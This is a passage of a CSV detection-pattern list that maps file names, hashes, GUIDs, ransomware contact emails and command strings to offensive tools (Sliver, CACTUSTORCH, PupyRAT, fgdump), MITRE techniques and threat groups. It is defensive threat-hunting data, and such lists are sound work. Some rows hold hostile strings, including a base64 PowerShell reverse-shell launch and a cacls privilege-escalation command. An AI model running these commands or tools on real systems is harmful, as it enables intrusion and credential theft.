"*CA9F2786DFE0A75DAF0A5C711B355D6EE0B2605D7F344E85DA9F4D40127EBC69*",".{0,1000}CA9F2786DFE0A75DAF0A5C711B355D6EE0B2605D7F344E85DA9F4D40127EBC69.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37462"
"*ca9f976e3685e42d665ae930876aa30ed3246882a002eae35469520ab38a6b5c*",".{0,1000}ca9f976e3685e42d665ae930876aa30ed3246882a002eae35469520ab38a6b5c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37463"
"*caa3c8d1a294def75b384c1bdfc7fab039da2d0e6c66beaae798adb0d9a22da4*",".{0,1000}caa3c8d1a294def75b384c1bdfc7fab039da2d0e6c66beaae798adb0d9a22da4.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","37464"
"*caa3f53715c68033d72a623dfcc2412cc86bce077d6081685ead3b1498e8b804*",".{0,1000}caa3f53715c68033d72a623dfcc2412cc86bce077d6081685ead3b1498e8b804.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","37465"
"*caa6677a1abcce4018d5e5872d19f134ebdf27ad34c6b9a7356454342db37624*",".{0,1000}caa6677a1abcce4018d5e5872d19f134ebdf27ad34c6b9a7356454342db37624.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37466"
"*CAA7AB97-F83B-432C-8F9C-C5F1530F59F7*",".{0,1000}CAA7AB97\-F83B\-432C\-8F9C\-C5F1530F59F7.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#GUIDproject","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37467"
"*caa9bf0d9c73fdc84aeed8abb19e9c81ad176abe83ae03d5b75daecd2c7925d5*",".{0,1000}caa9bf0d9c73fdc84aeed8abb19e9c81ad176abe83ae03d5b75daecd2c7925d5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37468"
"*caadd01f003376a0d92f5bcc416a1702802c5c1072907644e29f39fb2c6c513c*",".{0,1000}caadd01f003376a0d92f5bcc416a1702802c5c1072907644e29f39fb2c6c513c.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","37469"
"*caadddddf63205db589f52d153f1abb0cb41c204115f0a8e7a1fcaf8530ffb0f*",".{0,1000}caadddddf63205db589f52d153f1abb0cb41c204115f0a8e7a1fcaf8530ffb0f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37470"
"*cabe4a6eb9bea5241230a45710a5df1ecf984be0cdf3e3e5fd9d130daf05864f*",".{0,1000}cabe4a6eb9bea5241230a45710a5df1ecf984be0cdf3e3e5fd9d130daf05864f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37476"
"*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#base64","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","37478"
"*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*",".{0,1000}cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","#base64","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","37479"
"*cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152*",".{0,1000}cac03f25496480d919c18f2eae0bcbe2f80444345bbea088c7b61eddd3c0c152.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37480"
"*cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58*",".{0,1000}cacaf377019b13a2e03c1751bf05b0d1513c160ee5325dd54fdf541885846e58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37484"
"*cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e*",".{0,1000}cacfd6b17986292835f2cfa05562c0565a923a246677fc6eed01d426ba74300e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37487"
"*cache_activedirectory.py*",".{0,1000}cache_activedirectory\.py.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","37488"
"*CacheDump service successfully installed*",".{0,1000}CacheDump\sservice\ssuccessfully\sinstalled.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#content","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","37489"
"*cachedump.exe*",".{0,1000}cachedump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37490"
"*cachedump.py /*",".{0,1000}cachedump\.py\s\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","37491"
"*cachedump64.exe*",".{0,1000}cachedump64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37492"
"*cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f*",".{0,1000}cacls\sC\:\\Windows\\System32\\wermgr\.exe\.local\s\/e\s\/g\severyone\:f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","37493"
"*cactus@mexicomail.com*",".{0,1000}cactus\@mexicomail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37494"
"*cactus787835@proton.me*",".{0,1000}cactus787835\@proton\.me.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37495"
"*cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion*",".{0,1000}cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37496"
"*CACTUSTORCH.cna*",".{0,1000}CACTUSTORCH\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37497"
"*CACTUSTORCH.cs*",".{0,1000}CACTUSTORCH\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37498"
"*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37499"
"*CACTUSTORCH.hta*",".{0,1000}CACTUSTORCH\.hta.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37500"
"*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37501"
"*CACTUSTORCH.js*",".{0,1000}CACTUSTORCH\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37502"
"*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37503"
"*CACTUSTORCH.vba*",".{0,1000}CACTUSTORCH\.vba.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37504"
"*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37505"
"*CACTUSTORCH.vbe*",".{0,1000}CACTUSTORCH\.vbe.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37506"
"*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37507"
"*CACTUSTORCH.vbs*",".{0,1000}CACTUSTORCH\.vbs.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 